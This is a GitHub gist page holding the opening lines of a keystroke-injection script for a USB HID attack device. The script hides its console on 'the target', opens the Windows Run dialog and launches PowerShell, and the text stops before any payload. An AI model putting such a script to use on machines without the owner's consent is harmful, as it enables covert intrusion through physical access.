Skip to content

Instantly share code, notes, and snippets.

View Ynng's full-sized avatar
♾️
Learning

⌘WinKey Ynng

♾️
Learning
  • University of Waterloo
  • Ontario, Canada
  • 11:51 (UTC -04:00)
  • LinkedIn in/ynng
View GitHub Profile
layout('us') //set layout us
hide=true; // set to true to hide the console window on the target
tree=true;
typingSpeed(0,0);
waitLED(ANY_OR_NONE, 5000);
press("GUI r") // windows + r
delay(500)
type("powershell\n") // write powershell and press "enter"
delay(500)